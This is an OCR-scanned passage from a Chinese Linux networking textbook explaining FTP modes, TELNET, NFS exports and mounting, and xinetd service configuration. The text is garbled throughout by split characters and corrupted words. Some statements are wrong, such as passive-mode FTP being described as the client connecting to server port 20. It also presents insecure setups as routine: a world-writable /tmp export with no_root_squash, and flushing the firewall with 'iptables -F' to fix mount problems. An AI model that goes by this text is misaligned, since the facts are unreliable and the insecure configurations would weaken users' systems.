1. FTP 协议 的 步骤 


例如 一 个 用 户 想 把 远程 FTP 服务 器 上 的 某 个 文件 下 载 到 本 地 来 ， 需 要 经 过 如 下 几 个 
步骤 。 

(1) 首先 用 户 通过 FTP 接口 输入 命令 ， 让 FTP 客户 端 接口 连接 远方 的 FTP 服务 器 
主机 。 

(2) 连接 成 功 后 ， 远 程 的 FTP 服务 器 主机 要 求 输入 合适 的 用 户 名 和 密码 ， 在 用 户 名 和 
密码 得 到 正确 的 验证 后 ， 进 入 正常 的 FTP 下 载 过 程 。 

(3) 与 本 地 的 文件 系统 相似 ， 可 以 在 远程 的 FTP 服务 器 上 进行 文件 目录 的 转换 ， 进 入 
合适 的 日 录 ， 进 行 相关 的 操作 。 

(4) 对 目标 文件 的 下 载 ， 需 要 使 用 FTP 协议 特定 的 命令 行 格式 ，FTP 服务 器 进行 解析 
后 ,与 客户 端 之 间 进 行文 件 传输 。 

(5) 文件 传输 成 功 后 ， 客 户 端 关闭 与 服务 器 之 间 的 FTP 连接 。 
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2. FTP 是 双 端 口服 务 器 


与 6.1 节 中 介绍 的 HTTP 协议 相同 ，FTP 协议 也 建立 在 TCP 协议 之 上 ， 但 是 这 两 个 协 
议 之 间 有 很 大 的 差别 ， 最 主要 的 差别 是 FTP 协议 使 用 两 个 并 行 的 TCP 连接 来 传送 文件 ， 
一 个 是 控制 连接 ， 另 一 个 是 数据 连接 。 

控制 连接 用 于 在 客户 端 和 服务 器 端 之 间 传 送 控制 信息 , 例如 用 户 名 和 密码 、 改变 目录 、 
上 传 或 者 下 载 文件 的 命令 等 。 数 据 连 接 用 户 收发 数据 的 连接 信息 如 图 6.4 所 示 。 由 于 FTP 
协议 的 控制 信息 是 由 一 个 单独 的 TCP 连接 来 控制 ， 通 常 将 控制 信息 称 为 FTP 的 带 外 数据 ， 
即 控制 信息 是 不 包含 在 FTP 协议 的 数据 连接 之 中 的 。 


FTP 控 制 端口 号 21 
FTP 客 户 端 接口 FTP 服 务 器 
FTP 数 据 端口 号 20 


图 6.4 FTP 协议 的 双 TCP 端口 号 连接 


当 FTP 的 客户 端 与 远程 的 FTP 服务 器 端 启动 FTP 会 话 过 程 的 时 候 ，FTP 的 客户 端 首 
先 连接 FTP 服务 器 的 21 端口 。 po 将 登录 所 用 的 用 户 名 和 登录 密码 发 送 给 服务 
器 端 ， 登 录 成 功 后 就 可 以 进行 命令 交互 

经 典 的 FTP WE 告诉 服务 器 端 ， 以 方便 在 进行 文件 上 传 或 者 
下 载 的 时 候 服务 器 连接 客户 端的 数据 端口 .而 最 新 的 FTP 协议 允许 客户 端 连接 FTP 服务 器 
的 20 端口 来 进行 数据 的 收发 。 控制 数据 的 交互 通过 控制 连接 来 传输 , 而 文件 数据 的 传输 则 
通过 数据 端口 。 数 据 连接 在 本 次 传输 完成 后 ， 可 能 关闭 数据 连接 ， 到 下 次 的 传输 发 起 的 时 
候 再 次 打开 ， 因 此 数据 传输 是 非 持久 的 ， 如 图 6.5 所 示 。 


| 连接 服务 器 的 
控制 端口 21 
FTP 客 户 端 接口 | 一 登录 验 FTP 服 务 器 
|- 一 一 命令 交互 
服务 器 端 连接 |_ 客户 端 连 接 服务 器 
客户 端 数据 端口 | 端 数据 端口 20 
FTP 客户 端 接口 收发 数据 一 一 | FTP 服 务 器 | | FTP 客户 端 接口 收发 数据 
关闭 端口 一 一 | 关闭 端口 


图 6.5 ”FTP 协议 的 通信 过 程 解析 
在 整个 FTP 的 会 话 期 间 ，FTP 服务 器 必须 维护 连接 中 的 用 户 状态 。 也 就 是 说 ，FTP 服 
务 器 必须 把 某 个 控制 连接 与 某 个 用 户 对 应 起 来 ， 对 当前 用 户 的 状态 进行 跟踪 。 这 种 对 用 户 
状态 的 维护 限制 了 FTP 的 性 能 
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6.2.2 FTP 协议 的 工作 模式 


FTP 协议 的 工作 模式 分 为 主动 模式 和 被 动 模式 , 二 者 的 主要 区 别 在 于 对 数据 端口 的 处 理 
方式 不 同 : 主动 模式 在 客户 端 连接 后 ， 告 诉 服务 器 数据 连接 的 端口 ; 被动 模式 在 客户 端 连接 
后 ， 进 行 数据 传输 的 时 候 临 时 连接 FTP 服务 器 的 20 端口 ， 利 用 此 端口 进行 数据 的 传输 。 


1. 主动 模式 


主动 模式 又 叫 标准 模式 、PORT 模式 。 主 动 模式 下 FTP 协议 的 客户 端 和 服务 器 端 同 时 
作为 TCP 连接 的 客户 端 和 服务 器 端 ，FTP 客户 端 建立 数据 连接 的 TCP 服务 器 等 待 FTP 服 
务 器 端的 连接 。 一 个 主动 模式 的 FTP 连接 建立 遵循 以 下 步骤 。 

(1) FTP 客户 端 连接 FTP 服务 器 端的 21 端口 ， 建 立 控制 连接 。 

(2) FTP 客户 端 在 某 个 端口 建立 一 个 TCP 服务 器 , 进行 侦 听 等 待 服务 器 的 数据 连接 请 
求 。FTP 客户 端 使 用 PORT 命令 告诉 FTP 服务 器 客户 端的 命令 连接 侦 听 端口 。 

(3) FTP 服务 器 使 用 20 号 端口 ， 与 FTP 客户 端的 数据 连接 侦 听 端口 进行 连接 。 

(4) 传送 数据 的 时 候 通过 FTP 协议 的 客户 端 与 服务 器 端的 端口 进行 通信 。 


2. 被 动 模式 


被 动 模式 又 称 为 PASV 模式 。 被 动 模式 下 建立 命令 通道 的 方式 与 主动 方式 相同 ， 但 是 
命令 通道 建立 成 功 后 ，FTP 客户 端 不 发 送 port 命令 ， 而 是 发 送 pasv 命令 。FTP 服务 器 接收 
到 此 命令 后 ， 在 高 端口 上 随机 选取 一 个 端口 并 将 端口 号 告诉 客户 端 ， 客 户 端 在 这 个 端口 上 
与 服务 器 端 进行 数据 的 传输 。 

由 于 防火 墙 可 能 对 没有 开放 的 端口 进行 拦截 , 所 以 很 多 防火 墙 后 的 FTP 服务 器 和 客户 
端 不 能 正常 地 通过 主动 模式 或 者 被 动 模式 进行 数据 传输 ， 造 成 FTP 协议 不 能 正常 工作 ， 这 
通常 要 采用 模式 的 转换 ， 将 主动 模式 和 被 动 模式 进行 调整 。 


6.2.3 ”FTP 协议 的 传输 方式 


FTP 协议 有 两 种 传输 方式 ，ASCII 传输 模式 和 二 进 制 数据 传输 模式 ， 二 者 的 区 别 在 于 
对 传输 数据 是 否 进行 了 解释 。 

1. ASCII 传输 方式 

如 果 在 远程 机 器 上 运行 的 不 是 UNIX， 当 文件 传输 时 FTP 通常 会 自动 地 调整 文件 的 内 
容 以 便于 把 文件 解释 成 另外 那 台 计 算 机 存储 文本 文件 的 格式 。 

但 是 常常 有 这 样 的 情况 , 用 户 正在 传输 的 文件 包含 的 不 是 文本 文件 , 它们 可 能 是 程序 、 
数据 库 、 字 处 理 文件 或 者 压缩 文件 〈 尽 管 字 处 理 文件 包含 的 大 部 分 是 文本 ， 其 中 也 包含 有 
指示 页 尺寸 、 字 库 等 信息 的 非 打印 字符 )。 在 复制 任何 非 文本 文件 之 前 ， 用 binary 命令 告 
诉 FTP 逐 字 复 制 ， 不 要 对 这 些 文件 进行 处 理 ， 这 也 是 下 面 要 讲 的 二 进 制 传输 。 


2. 二 进 制 传输 模式 
在 二 进 制 传输 中 ， 数 据 中 保存 文件 的 位 序 ， 这 样 原始 的 数据 和 复制 的 数据 是 逐 位 一 一 
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对 应 的 ， 而 对 数据 内 容 本 身 不 进行 判断 。 

例如 ，Linux 操作 系统 以 二 进 制 方式 传送 可 执行 文件 到 Windows 系统 , 在 对 方 系统 上 ， 
此 文件 不 能 执行 。 如 果 在 ASCII 方式 下 传输 二 进 制 文件 ， 必 须 对 内 容 进 行 转译 。 这 会 使 传 
输 稍微 变 慢 ， 也 会 损坏 数据 ， 使 文件 变 得 不 能 用 (在 大 多 数 计算 机 上 ，ASCII 方式 一 般 假 
设 每 一 字符 的 第 一 有 效 位 无 意义 , 因为 ASCII 字符 组 合 不 使 用 它 。 如 果 你 传输 二 进 制 文件 ， 
所 有 的 位 都 是 重要 的 )。 如 果 你 知道 这 两 台 机 器 是 同样 的 , 则 二 进 制 方式 对 文本 文件 和 数据 
文件 都 是 有 效 的 。 
6.2.4 一 个 简单 的 FTP 过 程 

在 主机 192.168.1.150 上 使 用 Xlight FTP 建立 一 个 FTP 服务 器 , 站 点 上 仅 有 一 个 testtxt 
文件 。 在 FTP 服务 器 上 建立 用 户 名 和 密码 均 为 “test” 的 用 户 账号 。 使 用 此 账号 登录 FTP 
服务 器 下 载 test.txt 文件 的 过 程 如 下 : 


$ftp 192.168.1.150 (登录 FTP 服务 器 192.168.1.150) 
Connected to 192.168.1.150. 


220 Xlight FTP 3.1 就 绪 ... 


User (192.168.1.150: (none) ) : test (输入 用 户 名 test) 
331 需要 密码 test 

Password: (输入 密码 test) 

230 登录 成 功 

ftp> 1s ( 列 出 当前 目录 的 文件 ) 


200 PORT 命令 执行 成 功 

150 正在 打开 文本 模式 数据 连接 为 NLIST (10 比特 ) . 

test.txt (文件 test .txt) 
226 传送 完毕 (0.061 KB/s) . 

ftp: 收 到 10 字 节 ,用 时 0.01Seconds 0.67Kbytes/sec. 

ftp> get test.txt (下 载 文 件 test .txt) 
200 PORT 命令 执行 成 功 

150 正在 打开 二 进 制 模式 数据 连接 为 test .txt (0 比特 ) . 

226 传送 完毕 (0.000 KB/s) . 

ftp> bye (退出 ) 

221 再 见 


6.2.5 ”常用 的 FTP 工具 


在 Linux 下 常用 的 FTP 客户 端 有 FTP 命令 行 工具 ， 可 以 方便 地 使 用 命令 行进 行 FTP 
交互 。 在 Linux 操作 系统 下 经 常 使 用 的 还 有 一 个 图 形 界面 的 FTP 客户 端 工具 gftp。 

Linux 操作 系统 下 的 服务 器 端 经 常 使 用 的 有 vsftp 和 wuftp, 目前 使 用 vsftp 的 人 员 占 多 
数 ， 读 者 可 以 查阅 相关 的 资料 配置 自己 的 FTP 站 点 。 


6.3 TELNET 协议 和 服务 
TELNET 协议 是 最 早出 现 的 远程 登录 协议 之 一 , 使 用 TELNET 协议 可 以 在 本 机 上 登录 


到 远程 的 计算 机 上 进行 一 些 操作 。 这 在 服务 器 管理 中 经 常 使 用 ， 可 以 方便 地 通过 网 络 对 服 
务 器 的 资源 进行 访问 和 控制 。 
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6.3.1 登录 的 基本 概念 


分 时 操作 系统 允许 多 个 用 户 同时 使 用 一 台 计 算 机 。 为 了 保证 系统 的 安全 和 记 账 方便 ， 
系统 要 求 每 个 用 户 有 单独 的 账号 作为 登录 标识 ， 系 统 还 为 每 个 用 户 指 定 了 一 个 口令 。 用 户 
在 使 用 该 系统 之 前 要 输入 标识 和 口令 ， 这 个 过 程 被 称 为 “登录 ”。 远程 登录 是 指 用 户 使 用 
telnet 命令 ， 使 自己 的 计算 机 暂时 成 为 远程 主机 的 一 个 仿真 终端 的 过 程 。 


6.3.2 使 用 TELNET 协议 进行 远程 登录 的 工作 过 程 


使 用 TELNET 协议 进行 远程 登录 时 需要 满足 以 下 条 件 : 首先 在 本 地 主机 上 必须 装 有 包 
含 TELNET 协议 的 客户 程序 ， 还 必须 知道 远程 主机 的 卫 地 址 或 者 域名 ， 要 能 正常 登录 必 
须知 道 登 录 的 用 户 名 和 口令 ， TELNET 远程 登录 服务 分 为 以 下 4 个 过 程 : 

(1) 本 地 主机 与 远程 主机 建立 连接 。 这 个 建立 过 程 实际 上 是 建立 一 个 TCP 连接 ， 用 户 
必须 知道 远程 主机 的 IP 地 址 或 域名 。 

(2) 将 本 地 终端 上 输入 的 用 户 名 和 口令 , 以 及 以 后 输入 的 任何 命令 或 字符 以 NVT (Net 
Virtual Terminal) 格式 传送 到 远程 主机 。 该 过 程 实际 上 是 从 本 地 主机 向 远程 主机 发 送 一 个 
IP 数据 报 。 

(3) 将 远程 主机 输出 的 数据 转化 为 本 地 所 接受 的 格式 送 回 本 地 终端 ， 包 括 输 入 命令 回 
显 和 命令 执行 结果 。 

(4) 最 后 ， 本 地 主机 撤销 与 远程 主机 进行 的 连接 ， 这 个 过 程 是 撤销 一 个 TCP 连接 。 


6.3.3 TELNET 协议 


TELNET 协议 服务 器 软件 是 最 常用 的 远程 登录 服务 器 软件 ， 它 是 一 种 典型 的 客户 端 / 
服务 器 模型 的 服务 ， 使 用 TELNET 协议 来 工作 。 


1. 基本 内 容 


TELNET 协议 是 TCP/IP 协议 族 中 的 一 种 ， 是 Internet 远程 登录 服务 的 标准 协议 。 使 用 
TELNET 协议 能 够 把 本 地 用 户 所 使 用 的 计算 机 变 成 远程 主机 系统 的 一 个 终端 。 它 提供 了 3 
种 基本 服务 。 

口 TELNET 定义 一 个 网 络 虚拟 终端 为 远 地 系 统 提供 一 个 标准 接口 。 客 户 端 程序 不 必 

详细 了 解 远 地 系 统 ， 只 需 构 造 使 用 标准 接口 的 程序 。 

口 TELNET 包括 一 个 允许 客户 端 和 服务 器 协商 选项 的 机 制 ， 而 且 它 还 提供 一 组 标准 

选项 。 

口 TELNET 对 称 处 理 连接 的 两 端 ， 即 TELNET 不 强迫 客户 端 从 键盘 输入 ， 也 不 强迫 

客户 端 在 屏幕 上 显示 输出 。 


2. 异 构 网 络 适应 


为 了 使 得 多 种 操作 系统 间 的 TELNET 交互 操作 能 够 正常 进行 , TELNET 协议 定义 了 一 
些 统一 的 网 络 传输 格式 和 命令 。 
例如 ， 某 些 操作 系统 中 需要 每 行文 本 用 ASCII 回 车 控制 符 (CR) 结束 ， 另 一 些 系 统 则 
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需要 使 用 ASCII 换行 符 〈(LF) 作为 一 行 的 结束 标志 ， 还 有 一 些 系统 需要 用 两 个 字符 的 序列 
回 车 换行 (CRLF) 作为 结束 标记 。 
大 多 数 操作 系统 提供 了 一 个 中 断 当 前 程序 运行 的 快捷 键 ， 但 这 个 快捷 键 在 各 个 系统 中 
有 可 能 不 同 〈 一 些 系 统 使 用 CtrltC, 而 另 一 些 系 统 使 用 Esc 键 )。 如 果 不 考虑 多 种 操作 系统 
之 间 的 差异 和 异 构 性 ， 就 会 发 生 在 某 个 操作 系统 本 地 发 出 的 字符 或 者 命令 ,传送 到 远程 主 
机 后 不 能 正常 解析 的 情况 。TELNET 协议 定义 了 数据 和 命令 在 Internet 上 的 传输 方式 ， 即 
网 络 虚拟 终端 NVT (Net Virtual Terminal)。 它 的 应 用 过 程 如 下 所 述 。 
口 对 于 发 送 的 数据 :客户 端 软件 把 来 自用 户 终端 的 按键 和 命令 序列 转换 为 NVT 格 式 ， 
并 发 送 到 服务 器 ， 服 务 器 软件 将 收 到 的 数据 和 命令 ， 从 NVT 格式 转换 为 远 地 系统 
需要 的 格式 。 
口 对 于 返回 的 数据 : 远程 服务 器 将 数据 格式 转换 为 NVT 格式 ， 而 本 地 客户 端 将 接收 
到 的 NVT 格式 数据 再 转换 为 本 地 的 格式 。 
3. 传送 远 地 命令 
大 多 数 的 操作 系统 都 实现 各 种 控制 命令 的 各 种 快捷 键 操作 , 当 登 录 的 用 户 在 本 地 终端 输 
入 这 些 快捷 键 的 时 候 ， 本 地 系统 将 执行 对 应 的 本 地 控制 命令 ， 而 不 把 这 些 快捷 键 作为 输入 。 
TELNET 协议 使 用 NVT 来 定义 客户 端的 快捷 键 并 将 控制 功能 传送 到 服务 器 。 当 用 户 
从 本 地 输入 普通 字符 时 ，NVT 将 按照 其 原始 含义 传送 当 用 户 输 入 快捷 键 或 者 组 合 键 的 时 
候 ,， NVT 把 输入 的 键 值 转化 为 特殊 的 ASCII 字符 在 网 络 上 传送 , 并 在 其 到 达 服 务 器 后 转化 
为 相应 的 控制 命令 。 


4. 数据 流向 


TELNET 应 用 软件 有 一 个 缺点 ， 它 的 效率 不 高 。 主 要 是 其 中 的 数据 流向 造成 的 。 

数据 信息 被 用 户 从 本 地 键盘 输入 并 通过 操作 系统 传 到 客户 端 程序 ， 客 户 端 程序 将 其 处 
理 后 返回 操作 系统 ， 并 由 操作 系统 经 过 网 络 传送 到 服务 器 ， 服 务 器 的 操作 系统 将 所 接收 的 
数据 传 给 服务 器 程序 , 并 经 服务 器 程序 再 次 处 理 后 返回 到 操作 系统 上 的 终端 入 口 点 , 最 后 ， 
服务 器 操作 系统 将 数据 传送 到 用 户 正在 运行 的 应 用 程序 ， 这 便 是 一 次 完整 的 输入 过 程 ， 输 
出 将 按照 同一 通路 从 服务 器 传送 到 客户 端 。 

因为 每 一 次 输入 和 输出 时 ， 计 算 机 将 切换 进程 环境 好 几 次 ， 这 个 开销 是 很 昂贵 的 。 由 
于 用 户 按键 的 速率 并 不 高 ， 所 以 响应 速度 一 般 来 说 仍然 可 以 接受 。 


6.4 NFS 协议 和 服务 


NFS 协议 是 一 种 用 于 文件 共享 的 协议 ， 它 可 以 使 得 主机 之 间 进 行文 件 的 共享 。 客 户 端 
可 以 像 在 本 机 上 的 文件 一 样 操作 远程 主机 的 文件 。NFS 协议 最 初 仅 支持 UDP 协议 ， 目 前 
最 新 版 本 的 NFS 可 以 支持 UDP 或 者 TCP 协议 ， 不 过 UDP 协议 的 速度 会 更 快 。 


6.4.1 安装 NFS 服务 器 和 客户 端 
NFS 协议 是 一 个 十 分 简单 的 协议 ， 它 本 身 没有 提供 信息 传输 的 协议 和 功能 。 之 所 以 
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NFS 能 够 让 主机 之 间 通 过 网 络 进行 资料 共享 ， 这 是 因为 NFS 使 用 了 一 些 其 他 传输 的 协议 ， 
主要 用 到 了 RPC (Remote Procedure Call) 功能 。 所 以 在 启动 NFS 服务 器 的 时 候 需 要 启动 
RPC 服务 。 

在 Ubuntu 下 进行 NFS 服务 器 的 安装 有 两 个 版 本 可 供 选择 ，nfs-kernel-server 和 
nfs-user-server。 二 者 之 间 的 差别 在 于 前 者 是 在 内 核 层 实现 的 ， 速 度 更 加 快 ， 后 者 的 速度 相 
对 慢 一 些 。 读 者 可 以 根据 自己 的 需要 进行 选择 安装 。 


安装 NFS 服务 还 需要 安装 nfs-common， 当 然 ，Ubuntu 会 自动 提示 软件 之 间 的 依赖 关 
系 进 行 安装 。 


6.4.2 ”服务 器 端的 设 定 


要 使 安装 的 服务 器 程序 能 够 正常 工作 ， 主 要 的 工作 是 对 服务 器 的 配置 文件 进行 编辑 。 
这 个 配置 文件 是 /etc/exports， 这 个 文件 中 的 格式 如 下 : 
共享 的 目录 主机 名 称 1 或 者 IP1 (参数 1， 参数 2) 主机 名 称 2 或 者 IP2 (参数 3， 参 数 4) 


上 面 这 个 格式 表示 ， 将 同一 个 目录 共享 给 两 个 不 同 的 主机 ， 但 这 两 台 主机 的 访问 权限 
和 参数 是 不 同 的 ， 所 以 需 设置 两 个 主机 对 应 的 权限 。 可 以 设 定 的 参数 如 表 6.1 所 示 。 
表 6.1 NFS 的 服务 器 配置 参数 说 明 
参数 含义 
rw 可 读 写 的 权限 
ro 只 读 的 权限 


登录 到 NFS 主机 的 用 户 如 果 是 root 用 户 ， 拥 有 root 的 权限 ， 此 参数 很 不 安全 ， 建 议 
no_root_squash 不 要 使 用 


root_squash 不 能 使 用 root 权限 


all squash 不 管 登 录 NFS 主机 的 用 户 是 什么 都 会 被 重新 设 定 为 nobody 

anonuid 将 登录 NFS 主机 的 用 户 都 设 定 成 指定 的 user id， 此 ID 必须 存在 于 /etc/passwd 中 
anongid 同 anonuid， 但 是 换 成 了 组 ID 

Sync 资料 同步 写 入 存储 器 中 

async 资料 会 先 暂时 存放 在 内 存 中 ， 不 会 直接 写 入 硬盘 

insecure 允许 从 这 台 机 器 过 来 的 非 授权 访问 


编辑 /etc/exports 为 如 下 的 内 容 。 将 /tmp 目录 共享 为 任何 人 可 以 共享 并 可 以 进行 读 写 操 
作 ; /home/test 目录 192.168.1 子 网 下 的 主机 可 以 进行 读 写 ， 其 他 主机 只 读 。 


/tmp *(rw,no_root squash) 
/home/test 192.168.1.*(rw) * (ro) 


配置 好 后 可 以 使 用 以 下 命令 启动 NFS。 


/etc/init.d/nfs-kernel-server start 


6.4.3 ”客户 端的 操作 
要 在 客户 端 挂 载 服务 器 上 共享 的 NFS 目录 ， 使 用 通用 的 mount 命令 进行 ， 其 命令 格 
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式 为 : 
mount -t nfs 主机 名 或 者 主机 IP 地 址 : /共享 目录 名 挂 载 的 本 机 目录 


例如 对 于 上 述 服务 器 的 设置 ， 使 用 如 下 命令 将 /homeltest 目录 挂 载 到 本 机 的 /mnt/nfs 日 
录 下 。 


mount -t nfs 192.168.1.153:/home/test /mnt/nfs 


挂 载 到 本 机 目录 后 ， 由 于 本 机 和 服务 器 在 同一 个 网 段 上 ， 可 以 像 操 作 本 机 目录 中 的 文 
件 一 样 进 行 操 作 。 
全 注意 : 在 服务 器 正常 开启 之 后 ， 可 能 客户 端 不 能 正常 挂 载 服务 器 已 经 共享 出 来 的 目录 。 
一 般 是 由 于 Linux 防火 墙 开 启 ， 可 以 将 防火 墙 清空 或 者 关闭 ， 清 空 的 命令 为 : 


iptables -F 


6.4.4 ”showmount 命令 


在 NFS 相关 的 命令 中 showmount 命令 是 经 常 使 用 的 命令 。 它 主要 有 两 个 命令 选项 ， 
含义 如 下 所 述 。 

口 -a: 这 个 参数 是 一 般 在 NFS SERVER 上 使 用 ， 是 用 来 显示 已 经 挂 载 上 本 机 nfs 日 

录 的 客户 端 机 器 列表 。 

口 -e: 显示 指定 的 NFS SERVER 上 export 出 来 的 目录 。 

例如 ， 下 面 的 命令 列 出 当前 系统 中 的 NFS 服务 中 的 目录 共享 设置 情况 : 

$showmount -e 192.168.1.151 

Export list for localhost: 


/tmp * 
/home/test 192.168.1.* 


6.5 自 定义 网 络 服务 


Linux 操作 系统 是 为 网 络 而 诞生 的 操作 系统 ， 它 为 用 户 进行 网 络 服务 配置 提供 了 诸多 
便利 。 本 节 将 对 用 户 配置 自己 的 网 络 服务 进行 简单 的 介绍 ， 通 过 本 节 内 容 的 学 习 ， 用 户 可 
以 配置 简单 的 网 络 服务 程序 。 


6.5.1 xinetd/inetd 


在 Linux 操作 系统 中 ， 一 些小 的 服务 程序 或 者 不 经 常 使 用 的 服务 程序 ， 被 集成 到 一 个 
服务 器 管理 程序 中 , 通常 是 inetd， 目 前 一 般 使 用 xinetd。xinetd (eXtended InterNET services 
daemon)， 也 叫做 扩展 因特网 驻 留 程序 。 它 是 一 种 控制 因特网 服务 的 应 用 程序 ， 例 如 常用 
的 TELNET 服务 、FTP 服务 和 POP 等 服务 程序 通常 都 集成 在 这 个 服务 器 中 。 

在 进入 本 节 的 后 面部 分 之 前 ， 先 检查 一 下 系统 中 是 否 已 经 安装 了 xinetd 服务 程序 ， 可 
以 使 用 如 下 命令 : 


$ps ax|grep xinetd 
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如 果 没 有 安装 xinetd 服务 程序 ， 可 以 使 用 apt-get install xinetd 安装 这 个 软件 包 。 
6.5.2 ”xinetd 服务 配置 


xinetd 的 默认 配置 文件 是 /etc/xinetd.conf， 查 看 这 个 配置 文件 的 内 容 会 发 现 ， 它 将 
/etc/xinetd.d 目录 里 的 文件 包含 了 进来 。 


includedir /etc/xinetd.d 


在 /etc/xinet.d 目录 中 有 很 多 默认 的 配置 文件 ， 查 看 其 中 的 time 服务 配置 文件 。 


$ cat /etc/xinetd.d/time # 查 看 time 服务 配置 文件 

# default: off # 默 认 值 为 打开 

# description: An RFC 868 time server. This protocol provides a 
# 描 述 信息 


# site-independent, machine readable date and time. The Time service sends back 
# to the originating source the time in seconds since midnight on January first 


# 1900. 

# This is the tcp version. # 时 间 服 务 的 TCP 版 本 

service time # 服 务 程序 名 称 
disable = yes # 默 认为 服务 关闭 
type = INTERNAL # 类 型 为 内 部 程序 
id = time-stream # 标 识 为 time-stream 
socket type = stream # 流 式 套 接 字 
protocol = tcp # 协 议 为 TCP 
user = root #root 用 户 启动 
wait = no # 不 等 待 到 启动 完成 

} 

# This is the udp version. # 时 间 服 务 的 UDP 版 本 

service time # 服 务 程序 名 称 

{ 
disable = yes # 默 认为 服务 关闭 
type = INTERNAL # 类 型 为 内 部 程序 
id = time-dgram # 标 识 为 time- dgram 
socket type = dgram # 数 据 报 套 接 字 
protocol = udp # 协 议 为 UDP 
user = root #root 用 户 启动 
wait = yes # 不 等 待 到 启动 完成 


服务 time 是 一 个 时 间 服 务 , 用 于 向 客户 端 提供 网 络 时 间 校 准 。 对 于 一 个 服务 xinetd 的 
描述 类 型 ， 按 照 如 下 格式 进行 定义 : 
service 服务 名 称 
{ 
选项 = 


值 
选项 += 值 


上 


其 中 的 service 是 必需 的 关键 字 ,“ 服 务 名 称 ” 要 描述 的 服务 名 字 ， 之 后 的 属性 表 用 大 
括号 括 起 ， 其 中 的 每 一 项 都 定义 了 由 service-name 定义 的 服务 。 服 务 名 称 是 任意 的 ， 通 常 
是 标准 网 络 服务 名 ， 也 可 增加 其 他 非 标准 的 服务 。 选 项 的 操作 符 可 以 是 =、+=、 或 -=。 所 
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有 属性 可 以 使 用 =， 其 作用 是 分 配 一 个 或 多 个 值 ， 某 些 属性 可 以 使 用 “+=” 或 “-=” 的 形 
式 ， 它 的 作用 是 将 其 值 增加 到 某 个 表 中 ， 或 将 其 值 从 某 个 表 中 删除 。xinetd 的 指示 符 如 


表 6.2 所 示 。 
表 6.2 xinetd 的 指示 符 
指示 符 描 述 
网 络 套 接 字 类 型 ， 流 或 者 数据 包 ， 值 可 能 为 stream (TCP)，dgram (UDP), raw 
eke te 和 seqpacket 〈 可 靠 的 有 序数 据 报 ) 
protocol IP 协议， 通常 是 TCP 或 者 UDP 
wait yes/no， 等 同 于 inetd 的 wait/nowait 
user 运行 进程 的 用 户 ID 
server 要 激活 的 进程 ， 必 须 指定 执行 程序 的 完整 路 径 
server args 传递 给 server 的 变量 ， 或 者 是 值 
instances 可 以 启动 的 实例 的 最 大 值 
start max_load 负载 均衡 
log on success 成 功 启动 的 登记 选项 
log_on failure 联机 失败 的 时 候 的 日 ; 
only from 接受 的 网 络 或 是 主机 
no_access 拒绝 访问 的 网 络 或 是 主机 
disabled 用 在 默认 的 台中 禁止 服务 
log type 日 志 的 类 型 和 路 径 FILE/SYSLOG 
nice 运行 服务 的 优先 级 
id 日 志 中 使 用 的 服务 名 


6.5.3” 自 定义 网 络 服务 

本 节 中 以 vsftpd 为 例 进行 自 定义 网 络 服 务 的 设置 。 首 先 安装 vsftpd 服务 器 程序 ， 使 用 
命令 apt-get install vsftpd 进行 安装 。 

现在 应 该 以 root 的 身份 在 /etc/xinetd.d/ 目 录 中 编辑 文本 文件 proftpd， 内 容 如 下 : 


01 # default: on 
02 # description: The vsftpd server serves vsftpd sessions; 


这 是 一 个 vsftpd 服务 器 设置 文件 


默认 值 为 打开 


03 service vsftpd # 服 务 程序 名 称 

04 { 

05 disable = no # 默 认为 服务 打开 
06 Bport = 21 # 侦 听 端 口 为 21 
07 socket type = stream # 流 式 套 接 字 

08 protocol = tcp # 协 议 为 TCP 

09 user = root #root 用 户 启动 
10 server = /usr/sbin/vsftpd # 服 务 程序 路 径 为 /usr/sbin/Vvsftpd 
二 type = UNLISTED 

hy wait = no # 不 等 待 到 启动 完成 
i130} 

上 述 配 置 的 含义 如 下 所 述 。 
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口 第 1 和 第 2 行 是 注释 行 ， 不 用 管 它 。 第 3 行 是 定义 服务 的 名 称 为 vsftpd。 
口 第 5 行 disable 的 意思 是 禁用 ， 那 么 ，disable=no 就 是 启动 。 
口 第 6 行 是 指定 该 服务 的 端口 ，ftp 的 端口 是 21。 如 果 不 用 21 端口 ， 可 以 根据 
vsftpd.conf 文件 做 相应 的 改变 。 
第 7 行 是 socket 的 类 型 ， 这 里 设 为 stream ( 流 ) 。 
第 8 行 是 指定 协议 ， 这 里 设 为 tcp 协议 。 
第 9 行 是 启动 该 服务 的 用 户 ， 设 为 root。 
第 10 行 是 指定 运行 文件 的 路 径 。 
口 第 12 行 是 不 等 待 至 启动 完成 。 
在 编写 完毕 配置 文件 后 , 运行 killall -HUP xinetd。 然 后 使 用 ftp localhost 登录 进行 测试 ， 
可 以 发 现 FTP 程序 已 经 可 以 登录 了 。 


OODODD 


6.6 小 结 


本 章 对 Linux 操作 系统 下 的 主要 服务 进行 了 简单 的 介绍 ， 包 括 HTTP、FTP、TELNET 
和 NFS 协议 。 并 对 如 何 设置 用 户 个 人 的 服务 程序 进行 了 比较 详细 的 介绍 。 

HTTP 协议 FTP 协议 和 TELNET 协议 是 互联 网 比较 常用 的 协议 , 分 别 用 于 Web 访问 、 
文件 传输 和 远程 主机 的 登录 。 这 3 种 协议 都 是 基于 TCP 协议 ， 利 用 文本 命令 进行 控制 。 
NFS 协议 是 Linux 上 经 常 使 用 的 一 种 协议 ， 用 于 主机 之 间 共 享 文件 。 由 于 NFS 协议 采用 
UDP 协议 作为 传输 基础 ， 所 以 速度 上 要 快 得 多 。NFS 协议 在 嵌入 式 设 备 开发 的 时 候 经 常 使 
用 。 本 章 最 后 对 如 何在 Linux 下 定制 网 络 服务 进行 了 介绍 。 
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TCP 协议 是 TCP/IP 协议 中 很 重要 的 一 个 协议 ， 由 于 它 传输 的 稳定 性 ， 在 很 多 程序 中 
都 在 使 用 , 例如 HTTP、FTP 等 协议 都 是 在 TCP 的 基础 上 进行 构建 的 。 本 章 将 介绍 TCP 套 
接 字 的 编程 基础 知识 ， 主 要 包括 如 下 内 容 : 
口 套 接 字 编程 的 基础 知识 的 部 分 ， 介 绍 套 接 字 编 程 中 经 常 使 用 的 套 接 字 地 址 结构 ， 
对 内 核 和 应 用 层 之 间 的 内 存 数据 传递 方式 进行 简单 的 介绍 ; 
口 TCP 网 络 编程 的 流程 部 分 ， 简 单 介绍 TCP 套 接 字 服 务 器 、 客 户 端的 编程 框架 ， 对 
socket(O、bind0、1isten0)、acceptD、connect(、close0) 函 数 进行 介绍 ， 并 提 及 如 何 
使 用 read0 和 write0) 函 数 进行 数据 的 读 取 和 发 送 ; 
口 通过 一 个 简单 的 服务 器 /客户 端的 例子 介绍 TCP 网 络 编程 的 基本 流程 和 代码 ; 
